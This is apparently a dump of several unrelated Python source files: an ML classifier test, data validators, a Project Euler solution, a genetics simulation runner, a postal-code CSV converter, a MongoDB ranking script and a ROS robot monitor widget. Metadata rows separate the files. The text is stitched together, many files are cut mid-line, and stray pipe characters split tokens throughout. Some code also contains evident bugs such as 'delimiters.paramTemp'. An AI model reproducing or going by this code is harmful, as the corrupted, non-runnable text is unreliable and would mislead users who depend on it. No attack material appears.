publisher = kafka.KafkaBrokerPublisher(
netutils.urlsplit('kafka://127.0.0.1:9092?topic=ceilometer'))
with m |
fberanizo/sin5016 | tests/test_db2.py | Python | bsd-2-clause | 7,829 | 0.007207 | # -*- coding: utf-8 -*-
from context import svm, mlp
import unittest, numpy
from os import listdir
from os.path import isfile, join
from scipy.io import loadmat
from sklearn.decomposition import PCA
from sklearn.externals import joblib
from sklearn.model_selection import train_test_split, GridSearchCV, cross_val_score, StratifiedKFold
from sklearn.metrics import accuracy_score, classification_report
class DB2TestSuite(unittest.TestCase):
"""Suíte de testes para o conjunto de dados SDUMLA-HTM utilizando wavelet daubechies."""
def __init__(self, *args, **kwargs):
super(DB2TestSuite, self).__init__(*args, **kwargs)
X, y = self.read_dataset()
self.n_datasets = 10
self.X_train, self.X_test, self.y_train, self.y_test = [None]*self.n_datasets, [None]*self.n_datasets, [None]*self.n_datasets, [None]*self.n_datasets
self.X_train_PCA, self.X_test_PCA = [None]*self.n_datasets, [None]*self.n_datasets
# Divide conjunto de dados em 10 subconjuntos, ~840 amostras de 10 classes
print("Dividindo conjunto de dados em 10 subconjuntos...")
for i in range(self.n_datasets):
begin = i * 840
end = begin + 840
# 25% de cada conjunto de dados será para teste
self.X_train[i], self.X_test[i], self.y_train[i], self.y_test[i] = train_test_split(X[begin:end,:], y[begin:end], test_size=0.25)
# Aplica PCA para diminuir dimensionalidade dos dados
# até que a variância seja maior que 0.9. Só é utilizado para MLP.
pca = PCA(n_components=0.9)
self.X_train_PCA[i] = pca.fit_transform(self.X_train[i])
self.X_test_PCA[i] = pca.transform(self.X_test[i])
def test_db2(self):
"""Lê parâmetros, treina e testa modelos."""
k, clf1, clf2, clf3 = 3, [], [], []
# Treina classificadores em cada um dos 5 conjunto de dados
for i in range(self.n_datasets):
print("Treinando conjunto de dados %d de %d" % (i+1, self.n_datasets))
clf1.append(self.train_svm_linear(self.X_train[i], self.y_train[i]))
clf2.append(self.train_svm_rbf(self.X_train[i], self.y_train[i]))
clf3.append(self.train_mlp(self.X_train_PCA[i], self.y_train[i]))
joblib.dump(clf1[i], 'trained-estimators/db2-3-LL/svm-linear-'+str(i+1)+'.pkl')
joblib.dump(clf2[i], 'trained-estimators/db2-3-LL/svm-rbf-'+str(i+1)+'.pkl')
joblib.dump(clf3[i], 'trained-estimators/db2-3-LL/mlp-'+str(i+1)+'.pkl')
#y_pred = classifier.predict(X_test)
#print(classification_report(y_test, y_pred))
# Teste de Friedman
#clf1.append(joblib.load('trained-estimators/db2-3-LL/svm-linear-0.pkl'))
#clf2.append(joblib.load('trained-estimators/db2-3-LL/svm-rbf-0.pkl'))
#clf3.append(joblib.load('trained-estimators/db2-3-LL/mlp0.pkl'))
rank = []
for i in range(self.n_datasets):
# Cria um rank por acurácia de teste para cada modelo
rank.append(sorted([(1, clf1[i].score(self.X_test[i], self.y_test[i])), \
(2, clf2[i].score(self.X_test[i], self.y_test[i])), \
(3, clf3[i].score(self.X_test_PCA[i], self.y_test[i]))], key=lambda t: t[1], reverse=True))
rank = numpy.array(map(lambda r: [r[0][0], r[1][0], r[2][0]], rank))
# Calcula rank médio
rj = numpy.mean(rank, axis=0)
print("Rank médio para SVM Linear, SVM RBF e MLP: %s" % rj)
rmean = rank.mean()
sst = self.n_datasets * ((rj -rmean)**2).sum()
sse = 1.0/(self.n_datasets*(k-1)) * ((rank-rmean)**2).sum()
# Calcula estatística
chi_square = sst/sse
print("chi_square = %f" % chi_square)
# para k=3 e N = 5, p-valor < 0.05, chi^2 > 6.4
assert True
def read_dataset(self):
"""Lê o conjunto de dados e o divide em 5 partes."""
# O usuário deve definir três parâmetros, a saber:
# Nível de decomposição (1, 2 ou 3)
# Função wavelet mãe (db2, db4, sym3, sym4, sym5)
# Qual(is) sub-banda(s) utilizar (LL, HL, LH, HH)
path = join('/', 'home', 'fabio', 'imagens_clodoaldo', 'Wavelet')#input('Diretório com o conjunto de dados pré-processado (com os arquivos *.mat): ')
level = '3'#raw_input('Nível de decomposição (1, 2 ou 3): ')
wavelet = 'db2'#raw_input('Função wavelet mãe (db2, db4, sym3, sym4, sym5): ')
band = 'LL'#raw_input('Qual sub-banda) utilizar (LL, HL, LH, HH): ')
band_dict = {'LL':0, 'HL':1, 'LH':2, 'HH':3}
# Lê diretório com o conjunto de dados
path = join(path, wavelet)
files = [f for f in listdir(path) if isfile(join(path, f))]
files = sorted(files, key=lambda file: int(file.split('.')[0][1:]))
X, y = [], []
print("Lendo arquivos *.mat...")
for file in files:
try:
#print('Lendo arquivo %s'% file)
dataset = loadmat(join(path, file))
except Exception:
continue
finally:
# dataset['coef'][0][0][SUB-BANDA][0,LEVEL], SUB-BANDAS = [0..3] (LL, LH, HL, HH)
data = numpy.ravel(dataset['coef'][0][0][band_dict[band]][0,int(level)-1])
X.append(data)
y.append(int(file.split('.')[0][1:]))
X, y = numpy.array(X), numpy.array(y)
return X, y
def train_svm_linear(self, X, y):
"""Treina um SVM Linear e retorna o classificador treinado."""
clf = svm.SVM(kernel='linear')
grid = {'C': [1]}
# Realiza busca em grid de parâmetros com 5x2 Fold cross-validation
skf_inner = StratifiedKFold(n_splits=2)
skf_outer = StratifiedKFold(n_splits=5)
# Otimiza parâmetros (2-fold)
clf = GridSearchCV(estimator=clf, param_grid=grid, cv=skf_inner, verbose=0, n_jobs=2) |
clf.fit(X, y)
# Validação com parâmetros ótimos de treino (5-fold)
validation_score = cross_val_score(clf, X=X, y=y, cv=skf_outer, | verbose=0, n_jobs=1)
print("SVM Linear - Acurácia de validação = %f" % validation_score.mean())
return clf
def train_svm_rbf(self, X, y):
"""Treina um SVM RBF e retorna o classificador treinado."""
clf = svm.SVM(kernel='rbf')
grid = {'C': [1], 'gamma': [0]}
# Realiza busca em grid de parâmetros com 5x2 Fold cross-validation
skf_inner = StratifiedKFold(n_splits=2)
skf_outer = StratifiedKFold(n_splits=5)
# Otimiza parâmetros (2-fold)
clf = GridSearchCV(estimator=clf, param_grid=grid, cv=skf_inner, verbose=0, n_jobs=2)
clf.fit(X, y)
# Validação com parâmetros ótimos de treino (5-fold)
validation_score = cross_val_score(clf, X=X, y=y, cv=skf_outer, verbose=0, n_jobs=1)
print("SVM RBF - Acurácia de validação = %f" % validation_score.mean())
return clf
def train_mlp(self, X, y):
"""Treina MLP e retorna o classificador treinado."""
clf = mlp.MLP()
grid = {'hidden_layer_size': [15]}
# Realiza busca em grid de parâmetros com 5x2 Fold cross-validation
skf_inner = StratifiedKFold(n_splits=2)
skf_outer = StratifiedKFold(n_splits=5)
# Otimiza parâmetros (2-fold)
clf = GridSearchCV(estimator=clf, param_grid=grid, cv=skf_inner, verbose=0, n_jobs=2)
clf.fit(X, y)
# Validação com parâmetros ótimos de treino (5-fold)
validation_score = cross_val_score(clf, X=X, y=y, cv=skf_outer, verbose=0, n_jobs=1)
print("MLP - Acurácia de validação = %f" % validation_score.mean())
return clf
if __name__ == '__main__':
unittest.main()
|
DLR-SC/DataFinder | src/datafinder/core/configuration/properties/validators/base_validators.py | Python | bsd-3-clause | 13,874 | 0.010379 | # $Filename$
# $Authors$
# Last Changed: $Date$ $Committer$ $Revision-Id$
#
# Copyright (c) 2003-2011, German Aerospace Center (DLR)
# All rights reserved.
#
#Redistribution and use in source and binary forms, with or without
#
#modification, are permitted provided that the following conditions are
#met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of the German Aerospace Center nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
#A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
#OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
#SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
#LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
#DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
#THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
#OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This module defines a basic set of validation functions / classes for value verification.
"""
import decimal
import re
import sys
__version__ = "$Revision-Id:$"
class IsInRange(object):
"""
Checks whether a given value is in a specific range.
The requirement is that minimum, maximum and the value are comparable (<, > support).
"""
def __init__(self, minValue=None, maxValue=None):
"""
@param minValue: The lower bound.
@type minValue: C{object}
@param maxValue: The upper bound.
@type minValue: C{object}
"""
self.minValue = minValue
self.maxValue = maxValue
def __call__(self, value):
"""
Implements the validation.
@param value: The value to check.
@type value: C{object}
"""
if not self.minValue is None and value < self.minValue:
raise ValueError("The provided value is < than the defined minimum.")
if not self.maxValue is None and value > self.maxValue:
raise ValueError("The provided value is > then the defined maximum.")
class IsDecimalInRange(object):
"""
Class for checking boundaries of decimal values.
"""
def __init__(self, minValue, maxValue):
"""
@param minValue: The lower bound.
@type minValue: C{decimal.Decimal}, C{int}, C{long}, C{float}
@param maxValue: The upper bound.
@type maxValue: C{decimal.Decimal}, C{int}, C{long}, C{float}
"""
self.minValue = minValue
self.maxValue = maxValue
self.__inRangeValidator = IsInRange()
def __call__(self, value):
"""
Implements validation of the value.
The value is converted to C{decimal.Decimal} before performing the rang | e check.
"""
self.__inRangeValidator.minValue = _toDecimal(self.minValue)
self.__inRangeValidator | .maxValue = _toDecimal(self.maxValue)
self.__inRangeValidator(_toDecimal(value))
def _toDecimal(value):
""" Performs the conversion to C{decimal.Decimal}. """
if not isinstance(value, decimal.Decimal):
try:
value = decimal.Decimal(str(value))
except decimal.InvalidOperation:
raise ValueError("The value '%s' is no valid numeric." % str(value))
return value
class IsLengthInRange(object):
"""
Checks whether the length of a given value is in a specific range.
The values that can be checked with this validation class have to support
the "len" function.
"""
def __init__(self, minLength=None, maxLength=None):
"""
@param minLength: The lower bound.
@type minLength: C{int}
@param maxLength: The upper bound.
@type maxLength: C{int}
"""
self.minLength = minLength
self.maxLength = maxLength
self.__inRangeValidator = IsInRange()
def __call__(self, value):
"""
Implements the validation.
@param value: The value to check.
@type value: C{object}
"""
self.__inRangeValidator.minValue = self.minLength
self.__inRangeValidator.maxValue = self.maxLength
self.__inRangeValidator(len(value))
class IsNumberOfDecimalPlacesInRange(object):
"""
Checks whether the number of decimal places which was specified
is in a specific range.
"""
def __init__(self, minNumberOfDecimalPlaces=None, maxNumberOfDecimalPlaces=None):
"""
@param minNumberOfDecimalPlaces: The lower bound.
@type minNumberOfDecimalPlaces: C{int}
@param maxNumberOfDecimalPlaces: The upper bound.
@type maxNumberOfDecimalPlaces: C{int}
"""
self.minNumberOfDecimalPlaces = minNumberOfDecimalPlaces
self.maxNumberOfDecimalPlaces = maxNumberOfDecimalPlaces
self.__inRangeValidator = IsInRange()
def __call__(self, value):
"""
Implements the validation.
@param value: The value to check.
@type value: L{Decimal<decimal.Decimal>}, C{float}, C{int}
"""
value = _toDecimal(value)
# calculate specified number of decimal places
tupleRepr = value.as_tuple() # represents as: (sign, given digits, exponent)
if tupleRepr[2] >= 0: # positive or zero exponent
decimalPlaces = 0
else:
absolutExponent = abs(tupleRepr[2])
possibleNumberOfDecimalPlaces = len(tupleRepr[1])
if possibleNumberOfDecimalPlaces > absolutExponent:
decimalPlaces = absolutExponent
else:
decimalPlaces = possibleNumberOfDecimalPlaces
# check the calculated number of specified decimal places
self.__inRangeValidator.minValue = self.minNumberOfDecimalPlaces
self.__inRangeValidator.maxValue = self.maxNumberOfDecimalPlaces
self.__inRangeValidator(decimalPlaces)
class AreOptionsMatched(object):
"""
Checks whether a value is taken from a certain list of options.
The check is performed with the comparison operator.
"""
def __init__(self, options, optionsMandatory=True):
"""
@param options: List of options that the checked value have to be taken from.
@type options: C{list}
"""
self.options = options
self.optionsMandatory = optionsMandatory
def __call__(self, value):
"""
Implements the validation.
@param value: Value to check.
@type value: Depends on the concrete use case.
"""
if self.optionsMandatory:
if not value in self.options:
raise ValueError("The item is not taken from the specified options.")
class AreTypesMatched(object):
"""
Checks whether the value is from one of the allowed types.
"""
def __init__(self, valueTypes, exactMatch=True):
"""
@param valueTypes: List of class object.
@type valueTypes: C{list} of class objects.
@param exactMat |
bayandin/Project-Euler | 20.py | Python | mit | 453 | 0 | #!/usr/b | in/env python
# -*- coding: utf-8 -*-
"""
n! means n × (n − 1) × ... × 3 × 2 × 1
For example, 10! = 10 × 9 × ... × 3 × 2 × 1 = 3628800,
and the sum of the digits in the number 10! is 3 + 6 + 2 + 8 + 8 + 0 + 0 = 27.
Find the sum of the digits in the number 100!
http://projecteuler.net/problem=20
"""
factorial = 1
for i in range(2, 101):
factorial *= i
result = 0
for i in str(factorial):
result | += int(i)
print result
|
BrianTrethewey/negui | neLineRegress/SimBatchRun.py | Python | agpl-3.0 | 11,399 | 0.02123 | import ConfigParser
import os
import re
from itertools import product
import LineRegress
import ResultScraper
def readconfig(filename):
## SETS DEFaULTS
#all defaults must be in a list even if only one value
speciesFile = ""
outFolder = ""
lineRegressConfig = ""
lambdas = [1.0]
startPopulations = []#TODO need default
N0s = []#TODO need default
microsats = []#TODO need default
alleleCount = []#TODO needs default
SNPs = []#TODO need default
mutationRate = [0]
lociSampling = [1.0]
populationSampling = [1.0]
simReps = [100]
##SET FILE DELIMITERS
delimiters = ',|\||\n|;'
#open files
config = ConfigParser.ConfigParser()
config.readfp(open(filename))
#read in output filename
if config.has_section("outFolder"):
if config.has_option("outFolder", "name"):
outFolder = config.get("outFolder", "name")
##read species input file
if config.has_section("species"):
if config.has_option("species", "name"):
speciesFile = config.get("species", "name")
##read lineRegress input file
if config.has_section("lineRegress"):
if config.has_option("lineRegress", "name"):
lineRegressConfig = config.get("lineRegress", "name")
##read Lambda
if config.has_section("lambda"):
if config.has_option("lambda", "values"):
paramTemp = config.get("lambda", "values")
paramList = re.split(delimiters.paramTemp)
lambdas = [float(value) for value in paramList]
##read starting population
if config.has_section("startPop"):
if config.has_option("startPop", "values"):
paramTemp = config.get("startPop", "values")
paramList = re.split(delimiters.paramTemp)
startPopulations = [int(value) for value in paramList]
##read starting newborns (N0)
if config.has_section("startNewborns"):
if config.has_option("startNewborns", "values"):
paramTemp = config.get("startNewborns", "values")
paramList = re.split(delimiters.paramTemp)
N0s = [int(value) for value in paramList]
##read starting newborns (N0)
if config.has_section("N0"):
if config.has_option("N0", "values"):
paramTemp = config.get("N0", "values")
paramList = re.split(delimiters.paramTemp)
N0s = [int(value) for value in paramList]
##read Number of Microsats
if config.has_section("Microsats"):
if config.has_option("Microsats", "values"):
paramTemp = config.get("Microsats", "values")
paramList = re.split(delimiters.paramTemp)
microsats = [int(value) for value in paramList]
## read number of alleles per microsat
if config.has_section("alleleCount"):
if config.has_option("alleleCount", "values"):
paramTemp = config.get("alleleCount", "values")
paramList = re.split(delimiters.paramTemp)
alleleCount = [int(value) for value in paramList]
##read in number of SNPs
if config.has_section("SNPs"):
if config.has_option("SNPs", "values"):
paramTemp = config.get("SNPs", "values")
paramList = re.split(delimiters.paramTemp)
SNPs | = [int(value) for value in paramList]
##read in mutation Rate
if config.has_section("mutationRate"):
if config.has_option("mutationRate", "values"):
paramTemp = config.get("mutationRate", "values")
paramList = re.split(delimiters.paramTemp)
mutationRate = [float(value) for value in paramList]
if config.has_section("lociSampleRate"):
if config.has_option("lociSampleRate", "values"):
| paramTemp = config.get("lociSampleRate", "values")
paramList = re.split(delimiters.paramTemp)
lociSampling = [int(value) for value in paramList]
if config.has_section("individualSamplRate"):
if config.has_option("individualSamplRate", "values"):
paramTemp = config.get("individualSamplRate", "values")
paramList = re.split(delimiters.paramTemp)
populationSampling = [int(value) for value in paramList]
if config.has_section("simReps"):
if config.has_option("simReps", "values"):
paramTemp = config.get("simReps", "values")
paramList = re.split(delimiters.paramTemp)
simReps = [int(value) for value in paramList]
##create parameter dictionary for return
paramDict = {"species":speciesFile,
"outputFolder":outFolder,
"regressConfig":lineRegressConfig,
"lambdas":lambdas,
"startPops":startPopulations,
"N0":N0s,
"microsats":microsats,
"alleleCount":alleleCount,
"SNPs":SNPs,
"mutationRate":mutationRate,
"lociSampling":lociSampling,
"popSampling":populationSampling,
"simReps":simReps}
return paramDict
def runSimulation(species,outFolder,simReps,lambdaVal,startPop,N0,microSats,alleleCount,SNPs,mutationRate):
outputFiles = []
#create folder for simupop run
#run simupop
return outputFiles
def runNeEst(files,runFolder,locisampling,popsampling,regressConfig):
statsFile = ""
#create output folder
#run neEstimator
neFile = ""
#run lineregress
configVals = LineRegress.neConfigRead(regressConfig)
statsFile = LineRegress._neStatsHelper(neFile, configVals["alpha"], outFileName=statsFile,significantValue=configVals["sigSlope"],firstVal=configVals["startData"])
return statsFile
def gatherNe(fileName,firstVal):
results, temp = ResultScraper.scrapeNE(fileName,firstVal)
return results
def gatherPower(filename):
powerData = ResultScraper.scrapePower(filename)
return powerData
def gatherSlopes(filename):
instanceArray, arrayDict = ResultScraper.scrapeSlopes(filename)
return instanceArray
def createIdentifier(species, outFolder, simReps, lambdaVal, startPop, N0, microSats, alleleCount, SNPs, mutationRate, locisampling, popsampling, regressConfig):
identifier = "l"+str(lambdaVal)
+"p" + str(startPop)\
+ "N0" + str(N0) \
+ "m" + str(microSats)\
+ "ac" + str(alleleCount)\
+ "SNPs" + str(SNPs)\
+ "mr" + str(mutationRate)\
+ "ls" + str(locisampling)\
+ "ps" + str(popsampling)
return identifier
def parseIdentifier(identifier):
re.compile('l(?P<lambda>[\d.\.]*)p(?P<startPop>[\d*])N0(?P<N0>[\d]*)m(?P<microsats>[\d]*)ac(?P<allelecount>[\d]*)SNPs(?P<SNPs>[\d]*)mr(?P<mutations>[\d\.]*)ls(?P<locisampling>[\d\.]*)ps(?P<popsampling>[\d\.]*)')
def nameRunFolder(species,outFolder,simReps,lambdaVal,startPop,N0,microSats,alleleCount,SNPs,mutationRate,locisampling,popsampling,regressConfig):
runFolder = createIdentifier(species,outFolder,simReps,lambdaVal,startPop,N0,microSats,alleleCount,SNPs,mutationRate,locisampling,popsampling,regressConfig)
print runFolder
runFolder = os.sys.join(outFolder, runFolder)
if os.path.isdir(runFolder):
return None
return runFolder
def run(species,outFolder,simReps,lambdaVal,startPop,N0,microSats,alleleCount,SNPs,mutationRate,locisampling,popsampling,regressConfig):
runFolder = nameRunFolder(species,outFolder,simReps,lambdaVal,startPop,N0,microSats,alleleCount,SNPs,mutationRate,locisampling,popsampling,regressConfig)
if not runFolder:
return
os.makedirs(runFolder)
simFiles = runSimulation(species,runFolder,simReps,lambdaVal,startPop,N0,microSats,alleleCount,SNPs,mutationRate)
neFile, statsFile = runNeEst(simFiles,runFolder,locisampling,popsampling,regressConfig)
return neFile, statsFile
def runSamplingOnly(files,runFolder,locisampling,popsampling,regressConfig):
neFile, statsFile = runNeEst(files,runFolder,locisampling,popsampling,regressConfig)
return neFile,statsFile
def collectStatsData(neDict, statsDict, outFolder,firstVal):
slopesName = "slopes.csv"
powerName = "power.csv"
neName = "Ne.csv"
nePath = |
morinatsu/ZipCode | bin/make_loaddata.py | Python | mit | 2,655 | 0.001889 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
make_loaddata.py
Convert ken_all.csv to loaddata
"""
import argparse
import csv
def merge_separated_line(args):
"""
yields line
yields a line.
if two (or more) lines has same postalcode,
merge them.
"""
def is_dup(line, buff):
""" lines is duplicated or not """
# same post | alcode
if line[2] != buff[2]:
return False
# include choume and not
if line[11] != buff[11]:
return False
# line contains touten(kana)
if line[5].count(u'、') != 0:
return True
if buff[5].count(u'、') != 0:
return True
# | line contains touten(kanji)
if line[8].count(u'、') != 0:
return True
if buff[8].count(u'、') != 0:
return True
return False
def merge(line, buff):
""" merge address of two lines """
new_buff = []
idx = 0
for element in line:
if element[:len(buff[idx])] != buff[idx]:
new_buff.append(u''.join([buff[idx], element]))
else:
new_buff.append(buff[idx])
idx += 1
return new_buff
line_buffer = []
ken_all = csv.reader(open(args.source))
for line in ken_all:
unicode_line = [unicode(s, 'utf8') for s in line]
if not(line_buffer):
line_buffer = unicode_line
continue
if is_dup(unicode_line, line_buffer):
line_buffer = merge(unicode_line, line_buffer)
else:
yield line_buffer
line_buffer = unicode_line
yield line_buffer
def parse_args():
# parse aruguments
Parser = argparse.ArgumentParser(description='Make loaddata of postalcode.')
Parser.add_argument('source', help='input file of converting')
Parser.add_argument('area', help='data file for area-code')
Parser.add_argument('net', help='data file of net-code')
return Parser.parse_args()
def main(args):
# converting main
Areadata = csv.writer(open(args.area, 'w'),
delimiter=',',
quoting=csv.QUOTE_NONE)
Netdata = csv.writer(open(args.net, 'w'),
delimiter=',',
quoting=csv.QUOTE_NONE)
for line in merge_separated_line(args):
zipcode = line[2]
if zipcode[5:7] != '00':
Areadata.writerow([s.encode('utf8') for s in line])
else:
Netdata.writerow([s.encode('utf8') for s in line])
if __name__ == '__main__':
args = parse_args()
main(args)
|
ramaganapathy1/AMuDA-Ir-back-end | production/JVcode/Scripts/ForClassification/ela-sep.py | Python | mit | 2,166 | 0.017544 | import sys
from pymongo import MongoClient
from werkzeug.utils import secure_filename
import os
imp | ort sys
client = MongoClient('mon | godb://localhost:27017/')
db = client.ir
#li=[]
#color=open("AllColors.txt","r")
doc1=[]
doc2=[]
edgeConWT=[]
edgeElaWT=[]
edgeStart=[]
edgeEnd=[]
path="JVcode/Scripts/ForClassification/"
for file in os.listdir(path):
edgeElaWT = []
edgeConWT = []
edgeStart = []
edgeEnd = []
print (file)
if file.endswith(".tab.scores"):
fdTemp=open(path+file,"r")
#fdOut=open("output/new/elab-"+file,"w+")
for i1 in fdTemp:
line=i1.split(" ")
#print line
edgeStart.append(line[0])
edgeEnd.append(line[1])
edgeConWT.append(float(line[2]))
if(float(line[3]))>0:
edgeElaWT.append(float(line[3]))
else:
edgeElaWT.append(0.0)
for i in range(0,len(edgeElaWT)):
for j in range(0, len(edgeElaWT)):
if (j < (len(edgeConWT) - 1)):
if (edgeElaWT[j] < edgeElaWT[j + 1]):
temp = edgeElaWT[j]
edgeElaWT[j] = edgeElaWT[j + 1]
edgeElaWT[j + 1] = temp
temp2 = edgeStart[j]
edgeStart[j] = edgeStart[j + 1]
edgeStart[j + 1] = temp2
temp3 = edgeEnd[j]
edgeEnd[j] = edgeEnd[j + 1]
edgeEnd[j + 1] = temp3
#print (edgeEnd,edgeElaWT)
t2 = []
for k in range(0,5):
results = db.papers.find_one({'filename': edgeEnd[k][:-3] + 'pdf'})
print results
h={}
h['name'] = results['_id']
h['domain']=results['domain']
t2.append(h)
print ("To update : ",t2)
print("for => ",file)
str1="db.rPaper.update({'filename':"+ file[:-10]+"'pdf'}, {'$set': {'elaboration':}})"
print(str1)
results = db.rPaper.update({'filename': file[:-10]+'pdf'}, {'$set': {'elaboration': t2}})
print (results)
print "DONE" |
aslab/rct | higgs/branches/ros-groovy/higgs_gazebo_simulation/rqt_robot_plugins/rqt_robot_monitor/src/rqt_robot_monitor/robot_monitor.py | Python | gpl-3.0 | 24,412 | 0.000942 | # Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Isaac Saito, Ze'ev Klapow
import os
import rospkg
from diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus
from python_qt_binding import loadUi
from python_qt_binding.QtCore import QTimer, Signal
from python_qt_binding.QtGui import QColor
import rospy
from .abst_status_widget import AbstractStatusWidget
from .chronologic_state import InstantaneousState, StatusItem
from .time_pane import TimelinePane
from .util_robot_monitor import Util
class RobotMonitorWidget(AbstractStatusWidget):
"""
NOTE: RobotMonitorWidget.shutdown function needs to be called
when the instance of this class terminates.
RobotMonitorWidget itself doesn't store previous diagnostic states.
It instead delegates that function to TimelinePane class.
"""
_sig_tree_nodes_updated = Signal(int)
_sig_new_diagnostic = Signal(DiagnosticArray)
_TREE_ALL = 1
_TREE_WARN = 2
_TREE_ERR = 3
def __init__(self, context, topic):
"""
:param context: plugin context hook to enable adding widgets as a
ROS_GUI pane, 'PluginContext'
:param topic: Diagnostic topic to subscribe to 'str'
"""
super(RobotMonitorWidget, self).__init__()
rp = rospkg.RosPack()
ui_file = os.path.join(rp.get_path('rqt | _robot_monitor'), 'resource',
'robotmonitor_mainwidget.ui')
loadUi(ui_file, self, {'TimelinePane': TimelinePane})
#loadUi(ui_file, self)
obj_name = 'Robot Monitor'
self.setObject | Name(obj_name)
self.setWindowTitle(obj_name)
self._toplevel_statitems = [] # StatusItem
self._warn_statusitems = [] # StatusItem. Contains ALL DEGREES
# (device top level, device' _sub) in parallel
self._err_statusitems = [] # StatusItem
self.tree_all_devices.itemDoubleClicked.connect(self._tree_clicked)
self.warn_flattree.itemDoubleClicked.connect(self._tree_clicked)
self.err_flattree.itemDoubleClicked.connect(self._tree_clicked)
self.tree_all_devices.resizeColumnToContents(0)
self._sig_tree_nodes_updated.connect(self._tree_nodes_updated)
# TODO: Declaring timeline pane.
# Needs to be stashed away into .ui file but so far failed.
self.timeline_pane.set_timeline_data(Util.SECONDS_TIMELINE,
self.get_color_for_value,
self.on_pause)
self.vlayout_top.addWidget(self.timeline_pane)
self.timeline_pane.show()
self._paused = False
self._is_stale = False
self._last_message_time = 0.0
self._timer = QTimer()
# self._timer.timerEvent.connect(self._update_message_state)
self._timer.timeout.connect(self._update_message_state)
self._timer.start(1000)
self._sub = rospy.Subscriber(
topic, # name of the topic
DiagnosticArray, # type of the topic
self._cb)
self._sig_new_diagnostic.connect(self.new_diagnostic)
def _cb(self, msg):
"""
Intended to be called from non-Qt thread,
ie. ROS Subscriber in particular.
:type msg: DiagnosticArray
"""
# Directly calling callback function 'new_diagnostic' here results in
# segfaults.
self._sig_new_diagnostic.emit(msg)
def new_diagnostic(self, msg, is_forced=False):
"""
Overridden from AbstractStatusWidget.
When monitoring not paused, this public method updates all the
treewidgets contained in this class, and also notifies the StatusItem
instances that are stored in the all-device-tree, which eventually
updates the InspectorWindows in them.
:type msg: DiagnosticArray
:param is_forced: Intended for non-incoming-msg trigger
(in particular, from child object like TimelinePane).
@author: Isaac Saito
"""
if not self._paused and not is_forced:
self.timeline_pane.new_diagnostic(msg)
self._update_devices_tree(msg)
self._update_warns_errors(msg)
self._on_new_message_received(msg)
self._notify_statitems(msg)
rospy.logdebug(' RobotMonitorWidget _cb stamp=%s',
msg.header.stamp)
elif is_forced:
self._update_devices_tree(msg)
self._update_warns_errors(msg)
def _notify_statitems(self, diag_arr):
"""
Notify new message arrival to all existing InespectorWindow instances
that are encapsulated in StatusItem instances contained in
self._toplevel_statitems.
"""
for statitem_new in diag_arr.status:
corresp = Util.get_correspondent(statitem_new.name,
self._toplevel_statitems)
statitem_prev = corresp[Util._DICTKEY_STATITEM]
if statitem_prev and statitem_prev.inspector:
rospy.logdebug(' RobotMonitorWidget _notify_statitems ' +
'name=%s len toplv items=%d',
statitem_new.name, len(self._toplevel_statitems))
return
def resizeEvent(self, evt):
"""Overridden from QWidget"""
rospy.logdebug('RobotMonitorWidget resizeEvent')
self.timeline_pane.redraw()
def _tree_clicked(self, item, column):
"""
Slot to QTreeWidget.itemDoubleClicked
:type item: QTreeWidgetItem
:type column: int
"""
rospy.logdebug('RobotMonitorWidget _tree_clicked col=%d', column)
item.on_click()
def _update_devices_tree(self, diag_array):
"""
Update the tree from the bottom
:type diag_array: DiagnosticArray
"""
# TODO: 11/5/2012 Currently, in case some devices disappear
# while running this program, there's no way to remove
# those from the device-tree.
statusnames_curr_toplevel = [Util.get_grn_resource_name(status.name)
for status in self._toplevel_statitems]
# Only the status variable that pops up at the end is
# processed by Util.get_grn_resource_name.
